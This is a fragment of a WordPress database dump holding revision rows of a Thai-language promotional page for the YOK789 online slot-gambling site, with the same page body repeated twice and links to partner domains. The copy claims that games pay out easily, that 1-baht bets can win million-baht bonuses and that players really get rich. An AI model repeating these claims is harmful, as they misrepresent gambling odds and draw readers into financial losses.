target=\"_blank\">\n เข้าสู่ระบบ\n </a>\n <a href=\"http://luca333line.com\" target=\"_blank\">\n ติดต่อเรา\n </a>','header','','inherit','closed','closed','','32-revision-v1','','','2026-02-24 07:41:57','2026-02-24 07:41:57','',32,'https://yok789ss.com/?p=323',0,'revision','',0),(324,3,'2026-02-24 07:43:42','2026-02-24 07:43:42','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><b>ใช้ทุนน้อยก็เล่นได้ </b></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><b>เกมหลากหลาย ค่ายดังครบ </b></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน YOK789 เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>YOK789 ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <b>ปั่น สล็อต ฟรี</b> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2026-02-24 07:43:42','2026-02-24 07:43:42','',44,'https://yok789ss.com/?p=324',0,'revision','',0);
INSERT INTO `IwGJ28BV_posts` VALUES (325,3,'2026-02-24 07:43:43','2026-02-24 07:43:43','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><b>ใช้ทุนน้อยก็เล่นได้ </b></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><b>เกมหลากหลาย ค่ายดังครบ </b></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน YOK789 เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>YOK789 ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, 